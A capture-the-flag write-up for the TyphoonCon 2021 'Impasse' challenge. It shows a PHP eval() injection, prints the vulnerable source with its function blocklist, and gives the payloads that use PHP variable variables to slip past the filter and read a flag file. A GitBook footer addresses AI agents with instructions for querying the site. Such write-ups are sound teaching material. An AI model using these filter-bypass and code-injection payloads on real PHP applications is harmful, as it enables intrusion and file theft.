> For the complete documentation index, see [llms.txt](https://ctf.zeyu2001.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ctf.zeyu2001.com/2021/typhooncon-ctf-2021/impasse.md).

# Impasse

This is a PHP `eval()` injection challenge.

When submitting the form, the input is wrapped around an `echo` statement and added to the `print` GET parameter:

```http
?print=echo+'<YOUR DATA>'+;
```

The first thing we tried was to modify the GET parameter to test for arbitrary code execution:

```
print=echo+'';phpinfo()
```

![](/files/-Mei-lYUimgbsxT_9oBc)

By checking the `debug` option, we are presented with the page's source code. The following code implements the input blacklist and the `eval()` vulnerability:

```php
<?php
error_reporting(0);
if (isset($_GET['print'])) {
  if (!empty($_GET['print'])){
    $printValue= strtolower($_GET['print']);
    $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "nc";
    $$special_block= "../flag.txt";
    foreach ($blocked as $value) {
      if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }
  eval($printValue . ";");
  } 
}
?>
```

Many useful functions have been blocked! But note that the `eval()` statement is called *after* the `$blocked`, `$special_block` and `$$special_block` variables are defined. This allows us to reference these variables in our `eval`-ed code.

Note that `$$` has a special meaning in PHP: <https://stackoverflow.com/questions/4169882/what-is-in-php>

```php
$foo = 'hello';
$hello = 'The Output';
echo $$foo; // displays "The Output"
```

What happens here is that the value of `$foo` is used as a variable name, and so `$$foo` becomes `$hello` (think of it as replacing `$foo` in `$$foo`).

```php
$special_block= "nc";
$$special_block= "../flag.txt";
```

Here, the value of `$special_block` is used as a variable name. The second line defines a new variable, `$nc`, which has the value of `"../flag.txt"`.

Our final payload is

```
?print=echo+'';print(eval('return ${blocked}[4](${nc});'))
```

which leads to the following code being `eval`-ed:

```php
print(eval('return file_get_contents("../flag.txt");')
```

Note that `$[a-zA-Z]` is blocked in the regex, so we must use `${...}` instead (which achieves the same purpose). Also, `eval()` executes `file_get_contents("../flag.txt")` but doesn't display anything to us yet. By returning and printing the output, we retrieve the flag.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ctf.zeyu2001.com/2021/typhooncon-ctf-2021/impasse.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.